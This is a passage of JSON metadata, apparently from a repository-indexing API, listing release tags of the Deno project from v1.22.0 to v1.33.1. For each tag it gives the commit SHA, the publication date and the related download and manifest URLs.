nd":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/d